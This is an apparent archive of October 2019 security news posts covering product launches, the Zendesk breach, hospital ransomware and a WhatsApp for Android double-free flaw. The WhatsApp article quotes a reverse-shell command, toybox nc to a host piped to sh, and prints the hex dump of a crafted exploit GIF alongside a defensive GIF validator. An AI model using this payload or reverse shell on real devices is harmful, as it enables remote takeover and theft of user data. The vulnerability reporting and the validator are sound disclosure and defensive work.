Daily Archives: October 2, 2019

Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later a UPS truck loader. While … More

The post Good cybersecurity comes from focusing on the right things, but what are they? appeared first on Help Net Security.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

The US continues to warn its allies over China’s “predatory approach”, especially regarding 5G technology; this time the US Secretary of State has alerted Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again the US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries, explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against.”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy exercised its special powers in relation to the purchase of goods and services: the Italian government will impose conditions and technical specifications on the purchase of equipment and services for its 5G infrastructure.

In August, Romania announced that it will ban the Chinese giant Huawei from its 5G network, according to a joint statement signed by the Romanian and US presidents.

In April, the British Government approved a limited role for Huawei in the building of the country’s national 5G network, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant has already been excluded by several countries from building their 5G networks: the United States, Australia, New Zealand, and Japan have all announced the exclusion of Huawei technology from their 5G networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, a (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More

The post How security programs and breach history influence company valuations appeared first on Help Net Security.

Executives have to make cybersecurity a priority in order to secure their business

Businesses and organizations of all sizes have steadily begun to recognize the importance of cybersecurity to their success. As spending and awareness of the importance of cybersecurity increases, so does the demand for intelligence about how best to spend those funds and what security leaders can expect in today’s constantly evolving attack surfaces. To help give business leaders insight into the threat landscape to better mitigate risk, Optiv Security has published its 2019 Cyber Threat … More

The post Executives have to make cybersecurity a priority in order to secure their business appeared first on Help Net Security.

Security and compliance gaps of ineffective employee onboarding and offboarding

There are significant gaps in the compliant management of employee resources throughout the employment lifecycle. Just 15% of employees have all the resources they require to be productive on day one; further, more than half (52%) of IT professionals know someone who still has access to a former employer’s applications and data, according to Ivanti. When it comes to employee onboarding, 38% of IT professionals report it takes between two and four days to get … More

The post Security and compliance gaps of ineffective employee onboarding and offboarding appeared first on Help Net Security.

Ping Identity launches PingCentral, a self-service solution for enterprise IAM

Ping Identity, a pioneer in Intelligent Identity, announced the release of PingCentral, a self-service delegated administration and converged operating portal for enterprise identity and access management (IAM). The solution addresses common tasks across the Ping Intelligent Identity™ platform with simple, self-service workflows and standardized templates that can be delegated to business users and application teams that don’t have IAM expertise. Dedicated IAM administrators often struggle to manage the high volume of requests required to keep … More

The post Ping Identity launches PingCentral, a self-service solution for enterprise IAM appeared first on Help Net Security.

Ixia unveils IxProbe, increasing quality of service and profitability for MNSPs

Keysight Technologies, a leading technology company that helps enterprises, service providers and governments accelerate innovation to connect and secure the world, announced IxProbe from Ixia, a Keysight Business. IxProbe is an inline monitoring solution that provides managed network service providers (MNSPs) with access to real-time monitoring of computing that resides at the edge of a customer’s network, typically a branch office, to increase quality of service (QoS) and profitability. MNSPs face significant challenges in meeting … More

The post Ixia unveils IxProbe, increasing quality of service and profitability for MNSPs appeared first on Help Net Security.

Best Practices for Using Tripwire Enterprise in Dynamic Environments – Part 2

In my previous article, we discussed how organizations are shifting how IT resources are deployed and managed. We covered three methods in particular: automated image creation and deployment, immutable image deployment and containers. We’ll now explore how organizations can make the best of these methods in a dynamic environment. Dealing with Change when the Targets […]… Read More

The post Best Practices for Using Tripwire Enterprise in Dynamic Environments – Part 2 appeared first on The State of Security.

LogRhythm launches True Unlimited Data Plan for SIEM

LogRhythm, the company powering the world’s enterprise security operations centers (SOCs), announced that it launched the first True Unlimited Data Plan for its NextGen SIEM. Historically, organizations have paid more as data ingestion increased. While others in the industry have previously claimed to support unlimited data plans, they have always come with a catch. LogRhythm is changing that in an effort to provide predictability for CISOs; therefore, combatting the risk of unprotected data. Big data … More

The post LogRhythm launches True Unlimited Data Plan for SIEM appeared first on Help Net Security.

FireEye’s election security public resource helps governments enforce free and fair elections

FireEye, the intelligence-led security company, announced a free new election security public resource to include the latest cyber security recommendations and informational materials to help governments enforce free and fair elections. Building on existing FireEye materials and programs, this resource will host free webinars, event information, threat intelligence and solutions in one easily accessible place to tackle the issue of election security from a technology perspective, as well as one of emergency management and response … More

The post FireEye’s election security public resource helps governments enforce free and fair elections appeared first on Help Net Security.

ComplianceAlpha 2.0: Strengthen and streamline a risk and compliance program

ACA Compliance Group (ACA), a leading provider of governance, risk, and compliance advisory services and technology solutions, launched ComplianceAlpha 2.0. This next-generation compliance and risk management platform helps financial services firms stay one step ahead of regulators’ increasingly advanced technological capabilities to detect insider trading, market abuse, and other potential misconduct. The enhanced platform was designed and developed by the industry’s largest team of former regulators, financial technologists, and cybersecurity professionals. ComplianceAlpha 2.0 responds to … More

The post ComplianceAlpha 2.0: Strengthen and streamline a risk and compliance program appeared first on Help Net Security.

DataVisor expands its family of fraud detection solutions with the Advanced Rules Engine

DataVisor, the leading fraud detection company with solutions powered by transformational AI technology, has expanded its family of fraud detection solutions with the Advanced Rules Engine that augments its product suites of sophisticated proactive measurements for organizations in their fight against fraud. DataVisor Rules Engine leverages the recently launched Feature Platform to engineer complex features for advanced rule creation. It delivers advanced rule management and rule performance optimization to enable teams to manage complex rules … More

The post DataVisor expands its family of fraud detection solutions with the Advanced Rules Engine appeared first on Help Net Security.

Continuum expands automation capabilities for its RMM solution

Continuum, the Platform for What’s Next, announced that it has expanded its automation capabilities for its remote monitoring and management (RMM) solution, Continuum Command. The automation enhancements, built with an intuitive user design and plug-and-play attributes, help MSPs get work done quicker and turn their focus to higher-value projects, driving growth and better service. Easy-to-use automation is particularly crucial in the current labor market, as the existing skills gap widens. MSPs – particularly in the … More

The post Continuum expands automation capabilities for its RMM solution appeared first on Help Net Security.

Cohesity unveils Cohesity SmartFiles, an intelligent NAS solution designed for web scale

Cohesity announced Cohesity SmartFiles, a software-defined solution for files and objects that goes beyond traditional scale-out NAS (network attached storage) capabilities. SmartFiles empowers organizations to utilize integrated applications to bring exceptional intelligence to file-related IT infrastructure. SmartFiles also reduces storage costs with unique capacity efficiency and multi-tier data management capabilities. Unlike competitive products, SmartFiles integrates multi-layer cybersecurity to defend valuable business data against cyber threats. SmartFiles is ideal for a variety of workloads including collaboration … More

The post Cohesity unveils Cohesity SmartFiles, an intelligent NAS solution designed for web scale appeared first on Help Net Security.

Elastic launches version 7.4 of the Elastic Stack

Elastic, the company behind Elasticsearch and the Elastic Stack, announced the general availability of version 7.4 of the Elastic Stack. Debuting in version 7.4 are several new features that simplify cluster administration and operations, introduce new aggregation and machine learning capabilities, and deepen the stack security experience. On the solutions front, Elastic SIEM improves security operations workflows by adding real-time maps for geospatial analytics, and 13 more predefined machine learning jobs for detecting a range … More

The post Elastic launches version 7.4 of the Elastic Stack appeared first on Help Net Security.

Resecurity experiences financial and geographical growth

Resecurity, a cybersecurity company that delivers in-depth analysis layered on top of the most comprehensive, exclusive sets of data from the Deep and Dark Web, announces the company has experienced significant growth both financially and geographically. Resecurity’s sales have grown 300 percent year over year, with customers and services now offered worldwide including in Europe, Middle East, North Africa, Asia and Latin America. “Fueling our growth is the need for mature, offensive threat intelligence is … More

The post Resecurity experiences financial and geographical growth appeared first on Help Net Security.

Smashing Security #148: Billboard boobs, face forensics, and Alexa gets way too personal

Drivers are distracted by a hacked billboard, we take a deeper look at how the deepfake problem has… uh… deepened, and Carole is less than happy about Amazon’s announcement about new Alexa integrations.

All this, an annoying goose, and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

ISACA expands its leadership team

Global technology association ISACA has added two roles on its leadership team that are the first of their kind at the organization— welcoming its first Chief Learning Officer, Nader Qaimari, as well as first Chief Technology Officer, Simona Rollinson. As CLO, Qaimari takes on ISACA’s learning and certification offerings for individual professionals, including the Certified Information Systems Auditor (CISA), Certified in Risk and Information Systems Control (CRISC), Certified Information Security Manager (CISM), Certified in the … More

The post ISACA expands its leadership team appeared first on Help Net Security.

Awake Security appoints Kevin Mandia to its board of directors

Awake Security, the only advanced network traffic analysis (NTA) company that delivers a privacy-aware solution, announced the appointment of Kevin Mandia, CEO of FireEye, to its board of directors. “Kevin has had a material impact in shaping the security industry by being in the trenches with security teams as they respond to incidents. Understanding how the attackers operate has helped him build teams of experts that have come to the aid of numerous organizations across … More

The post Awake Security appoints Kevin Mandia to its board of directors appeared first on Help Net Security.

Neustar adds new members to the Executive Committee

Neustar, a global information services company and leader in identity resolution, announced the appointment of Brian McCann as Executive Vice President and President of Security Solutions and Lee Kirschbaum as Senior Vice President of Communications Solutions and Corporate Business Development. Both will be members of the Executive Committee and report to Neustar President and CEO Charlie Gottdiener. “Neustar is fortunate to have attracted two accomplished industry veterans who share our acute focus on creating value … More

The post Neustar adds new members to the Executive Committee appeared first on Help Net Security.

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of about 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019, the company had identified approximately 10,000 affected Zendesk Support and Chat accounts, including expired trials and accounts that are no longer active.

The customer service software firm decided to alert all the impacted customers, inviting them to take the following steps:

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one.
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps   

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

In any case, customers are advised to change their passwords. One point worth checking when acting on the TLS advice above: because the exposed material includes the private keys that customers uploaded, the replacement certificate must be issued for a newly generated key pair; reissuing a certificate over the same key leaves the exposure in place.

This isn’t the first security breach suffered by Zendesk, the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations appeared first on Security Affairs.

Vaughan partners with VentureLAB, York U, and Mackenzie Health to plan modern health precinct

As the City of Vaughan works towards the opening of the brand-new Mackenzie Vaughan Hospital in late 2020, it announced a partnership today with VentureLAB, York University, and Mackenzie Health to conduct a feasibility study and envision the plans for the Vaughan Healthcare Centre Precinct. The proposed complex is planned to be built on the…

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher who goes by the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage it to execute arbitrary code remotely on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp() function in decoding.c of the libpl_droidsonroids_gif.so library, which WhatsApp uses to generate the preview of a GIF file when a user opens the Gallery view to send a media file.

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

The expert was able to craft a GIF file that gives control of the PC register, and from there achieved code execution by having the process run the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point PC directly at the system() function in libc.so; instead, PC first had to jump to an intermediate gadget.

“We need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost,” continues the expert. “Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed code that generates the malformed GIF file that triggers the vulnerability:

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

He then copied the output into a GIF file and sent it as a Document via WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file cannot be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before sending it. The vulnerability is triggered when the target user who received the malicious GIF file opens the WhatsApp Gallery to send a media file to a contact.

These are the two attack vectors the expert devised:

  1. Local privilege escalation (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has a remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works against WhatsApp version 2.19.230 and prior versions; the company addressed it with the release of version 2.19.244.

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.
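The structure of the file printed above can be checked before any decoder touches it. What follows is an added example, not the researcher’s generator and not the library’s own code: a small C walker that validates a GIF’s block structure, checking every color table, block and sub-block length against the data actually present, and every image descriptor against the logical screen, which is the bound a decoder works from when it sizes a raster buffer. The first input is the 266-byte file transcribed from the hex dump above; the second is a constructed, well-formed 1×1 GIF used as a control. Whether the oversized first frame is the exact condition that drives the double free is not something this check establishes, but a frame that does not fit the screen is precisely the kind of input that raster sizing in a decoder must cope with, and rejecting it at the receiving boundary costs nothing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result bits from gif_check(); GIF_CLEAN means the walk reached the trailer with no findings. */
enum {
    GIF_CLEAN         = 0,
    GIF_BAD_HEADER    = 1 << 0,  /* shorter than 13 bytes or not "GIF87a"/"GIF89a" */
    GIF_TRUNCATED     = 1 << 1,  /* a color table, block or sub-block runs past the end of the data */
    GIF_FRAME_OOB     = 1 << 2,  /* an image descriptor does not fit inside the logical screen */
    GIF_UNKNOWN_BLOCK = 1 << 3,  /* block introducer other than 0x21, 0x2C or 0x3B */
    GIF_NO_TRAILER    = 1 << 4   /* data ended before the 0x3B trailer */
};
struct gif_summary { unsigned width, height, frames; };

static unsigned rd16(const uint8_t *p) { return p[0] | (unsigned)p[1] << 8; }

/* Walk a chain of data sub-blocks (length byte + payload; a zero length terminates). Returns 0 on overrun. */
static int skip_subblocks(const uint8_t *p, size_t len, size_t *off)
{
    for (;;) {
        if (*off >= len) return 0;
        uint8_t n = p[(*off)++];
        if (n == 0) return 1;
        if (n > len - *off) return 0;
        *off += n;
    }
}

/* Structural check only: nothing is LZW-decoded and no raster buffer is allocated. */
int gif_check(const uint8_t *p, size_t len, struct gif_summary *s)
{
    int flags = GIF_CLEAN;
    size_t off = 13;                                      /* signature + logical screen descriptor */
    s->width = s->height = s->frames = 0;
    if (len < 13 || memcmp(p, "GIF8", 4) != 0 || (p[4] != '7' && p[4] != '9') || p[5] != 'a')
        return GIF_BAD_HEADER;
    s->width = rd16(p + 6); s->height = rd16(p + 8);
    if (p[10] & 0x80) {                                   /* global color table: 3 * 2^(n+1) bytes */
        size_t gct = 3u << ((p[10] & 7) + 1);
        if (gct > len - off) return GIF_TRUNCATED;
        off += gct;
    }
    for (;;) {
        if (off >= len) return flags | GIF_NO_TRAILER;
        uint8_t id = p[off++];
        if (id == 0x3B) return flags;                     /* trailer: walk complete */
        if (id == 0x21) {                                 /* extension: label byte, then sub-blocks */
            if (off++ >= len) return flags | GIF_TRUNCATED;
            if (!skip_subblocks(p, len, &off)) return flags | GIF_TRUNCATED;
        } else if (id == 0x2C) {                          /* image descriptor: 9 fixed bytes */
            if (len - off < 9) return flags | GIF_TRUNCATED;
            unsigned left = rd16(p + off), top = rd16(p + off + 2);
            unsigned w = rd16(p + off + 4), h = rd16(p + off + 6);
            uint8_t fl = p[off + 8];
            off += 9; s->frames++;
            if (left + w > s->width || top + h > s->height) flags |= GIF_FRAME_OOB;
            if (fl & 0x80) {                              /* local color table */
                size_t lct = 3u << ((fl & 7) + 1);
                if (lct > len - off) return flags | GIF_TRUNCATED;
                off += lct;
            }
            if (off++ >= len) return flags | GIF_TRUNCATED; /* LZW minimum code size byte */
            if (!skip_subblocks(p, len, &off)) return flags | GIF_TRUNCATED;
        } else return flags | GIF_UNKNOWN_BLOCK;
    }
}

/* Input 1: the 266 bytes the researcher's generator printed, transcribed from the hex dump above. */
static const uint8_t crafted_gif[] = {
    0x47,0x49,0x46,0x38,0x39,0x61,0x18,0x00,0x0A,0x00,0xF2,0x00,0x00,0x66,0xCC,0xCC,
    0xFF,0xFF,0xFF,0x00,0x00,0x00,0x33,0x99,0x66,0x99,0xFF,0xCC,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x08,0x00,0x15,0x00,0x00,0x08,
    0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x84,0x9C,0x09,0xB0,
    0xC5,0x07,0x00,0x00,0x00,0x74,0xDE,0xE4,0x11,0xF3,0x06,0x0F,0x08,0x37,0x63,0x40,
    0xC4,0xC8,0x21,0xC3,0x45,0x0C,0x1B,0x38,0x5C,0xC8,0x70,0x71,0x43,0x06,0x08,0x1A,
    0x34,0x68,0xD0,0x00,0xC1,0x07,0xC4,0x1C,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x54,0x12,0x7C,0xC0,0xC5,0x07,0x00,0x00,0x00,0xEE,0xFF,0xFF,0x2C,0x00,0x00,
    0x00,0x00,0x1C,0x0F,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x1C,0x0F,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,
    0x18,0x00,0x0A,0x00,0x0F,0x00,0x01,0x00,0x00,0x3B
};
/* Input 2 (constructed): a well-formed 1x1 GIF89a with a global color table, one graphic control extension and one frame. */
static const uint8_t tiny_gif[] = {
    0x47,0x49,0x46,0x38,0x39,0x61,0x01,0x00,0x01,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,
    0x21,0xF9,0x04,0x01,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,
    0x02,0x02,0x44,0x01,0x00,0x3B
};

int main(void)
{
    struct gif_summary s;
    int f = gif_check(crafted_gif, sizeof crafted_gif, &s);
    printf("crafted: flags=0x%x screen=%ux%u frames=%u\n", f, s.width, s.height, s.frames);
    f = gif_check(tiny_gif, sizeof tiny_gif, &s);
    printf("control: flags=0x%x screen=%ux%u frames=%u\n", f, s.width, s.height, s.frames);
    f = gif_check(tiny_gif, 30, &s);                      /* the control file cut short */
    printf("cut:     flags=0x%x\n", f);
    return 0;
}
```

On the crafted file the walk completes (every sub-block length is consistent with the 266 bytes, so GIF_TRUNCATED is not raised), two frames are counted, and GIF_FRAME_OOB is set because the first image descriptor declares an 8×21 frame inside a 24×10 logical screen; the control file comes back GIF_CLEAN, and cutting it to 30 bytes yields GIF_TRUNCATED. The check reads only header fields and length bytes, so it is safe to run on untrusted input at a message-receiving boundary; it is a pre-filter, not a substitute for a decoder that bounds its own allocations.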

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Prepare to Attack in Autumn

We still love feedback! Our quarterly event series launched last December with hundreds of participants and dozens of great suggestions. Since then we’ve had two more quarterly events, hosted dozens of OWASP, ISSA, and conference Cyber Ranges, and received inboxes full of overwhelmingly positive suggestions. This feedback has allowed our team to provide even more to the AppSec community:

Microsoft Surface Pro X uses a custom Qualcomm-made SQ1 processor

The last time Microsoft put an ARM processor in a Surface was in 2012 when the series first launched. Powered by an Nvidia Tegra chip, the Surface RT (Run Time) was ill-received due to the lack of native apps and the ultra-restrictive Windows 8 RT operating system. But ARM has resurfaced in the Surface Pro…

The Reinvention of HR: Managing HCM Trends and the Evolving Workforce

Preparing today for tomorrow’s increasingly diverse workforce This is the first time in history that there are five generations at work together, and the business implications of such a diverse workforce working side by side cannot be overestimated. Recently, 60 percent of CEOs surveyed by PricewaterhouseCoopers indicated that the multigenerational workforce will in fact “transform”…

Hackers Are Impersonating Each Other to Hide Their Real Agendas


Threat actors have been using cyber-disguises to keep their true intentions secret, according to a report published today by Optiv Security.

Typical cyber threat intelligence usually categorizes threat actors in fixed classes, such as nation-states, cyber-criminals, commercial entities, and hacktivists. But, according to Optiv’s new 2019 Cyber Threat Intelligence Estimate (CTIE) report, "it’s a mistake to assume these categories are rigid or to assume that a threat actor’s classification is static."

The CTIE report is inspired by national intelligence estimates, which are analytic reports produced by the intelligence community of the United States for consumption by Congress. The CTIE comprises contributions from Optiv’s Global Threat Intelligence Center (gTIC), cyber threat intelligence company IntSights, and Carbon Black, a leader in cloud endpoint protection.

Optiv researchers found that it's not unusual for threat actors to have multiple criminal identities that they can switch between to get what they want without revealing who they are or what their actual agenda is.

For example, nation-state actors may pretend to be just a regular cyber-criminal targeting a company’s customer database, when in reality their target is to delve into the firm's deepest recesses to steal its intellectual property. 

According to the report: "Sometimes threat actors may masquerade as a certain type in order to hide their true agenda. Or, threat actors may belong to two or more classes, switching between them as their priorities change."

Threat actors who demonstrate this switching behavior to cloak the true nature of their dastardly deeds are described by Optiv's researchers as "hybrid threat actors." According to the report, their primary targets are governments, manufacturing, energy, and utilities. 

According to Optiv CISO Brian Wrozek, spotting when an impersonation is taking place is "quite difficult." He told Infosecurity Magazine: "Imagine robbing a bank, but the bank robber is able to present themselves as a police officer. It would be extremely difficult to identify that person. Security professionals look for patterns, which can create opportunities for bad actors to abuse those patterns to obscure their true identities."

Asked which class of threat actor is the easiest to impersonate, Wrozek said: "It’s difficult to say which is easiest, but one of the most common places we see this is in regard to nation-states. With so much politically driven activity regarding cybersecurity happening across the globe, it can be easy for nation-states to play the blame game with one another, making attribution difficult. Also, no one likes to admit they got hacked by some random individual. Saying a rich, powerful nation-state was behind an attack is much less embarrassing, so there’s that aspect to consider as well."

Other findings of the report are that crypto-jacking and ransomware attacks are increasing in popularity, and that retail, healthcare, government, and financial institutions continue to be among the most targeted of the 10 client verticals Optiv tracks.

"Cyberspace has become more hostile. Hackers are more organized and sophisticated in 2019, and we’re seeing malicious attackers increase their counter measures to avoid detection,” said Tom Kellermann, chief cybersecurity officer at Carbon Black. 

"According to our research, no vertical is immune, but the financial industry continues to stand out as a key target for advanced attacks. We hope cybersecurity leaders and teams will use this data as a clarion call to improve their cybersecurity postures."

10 Hospitals Held to Ransom by Cyber-Criminals


Ten hospitals in Australia and the United States have been hit by ransomware attacks since Monday. 

In America, computers at three Alabama hospitals operated by DCH Health System were affected, causing staff to close their doors to any new patients who weren't critically ill. 

In a statement posted on their website earlier today, DCH wrote: "Early Oct 1, the DCH Health System discovered that it had suffered a ransomware attack that impacted their systems. We immediately implemented emergency procedures to continue providing safe and patient-centered care."

The hospitals affected by the attack are DCH Regional Medical Center in Tuscaloosa, Fayette Medical Center and Northport Medical Center. While access to computer systems remains limited, local ambulances are taking patients to other healthcare providers located nearby. 

Surgeries scheduled for tomorrow will go ahead; however, outpatients with appointments at any of the three hospitals affected by the ransomware attack are advised to call to confirm before attending.

Services at seven hospitals and healthcare facilities in Australia have likewise been disrupted by ransomware in a separate cyber-attack which struck in Gippsland and south-west Victoria on Monday.

The impacted hospitals are part of the South West Alliance of Rural Health and of the Gippsland Health Alliance. Multiple computer systems have been disconnected while the Victorian Cyber Incident Response Service works to resolve the situation.

Barwon Health, which operates hospitals affected by the attack, said that some elective surgeries and appointments had been cancelled. 

The Victorian government's Department of Premier and Cabinet said: "A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact. 

"At this time, there is no suggestion that personal patient information has been accessed."

Commenting on the ransomware attacks, senior director of managed threat response at Sophos, J.J. Thompson, said: "Ransomware is foreseeable and preventable. Organizations need to have effective, advanced protection in place at every stage of an attack. The techniques, tactics and procedures that occur prior to a ransomware incident can and should be detected by existing security capabilities and are foundational pillars to the patient care model in healthcare 4.0.

"It’s also important to have off-site backups to reduce the pressure to comply with expensive ransom demands and to be able to recover faster."

MITRE ATT&CK™ APT3 Assessment

Making the case for the importance of real-time reporting is a simple exercise when considering almost every major campaign. Take the case of Shamoon, where analysis of the Disttrack wiper revealed a future date on which the destruction would happen. Similarly, cases where actors use different techniques in their attacks reveal that, once mapped out, a story becomes visible. The question is: do you have visibility and early warnings into these threats, and how quickly are they presented to you so that there is time to respond? 

MITRE’s ATT&CK for Enterprise, produced by the Cyber Security division of MITRE, is an adversarial behavior model of possible attacker actions. The ATT&CK matrix is a visualization tool in the form of a large table, intended to provide a framework for talking about attacks in a unified way. This is coupled with detailed descriptions of the different tactics and techniques and how they differ from attacker to attacker.  

When you participate in the assessment, MITRE acts as the red team, simulating the techniques (in this case those used by APT3), and McAfee acts as the blue team, using our products to detect their actions and report them. When the red team attacks us with a variant of a technique, we as the blue team need to prove we detected it. 

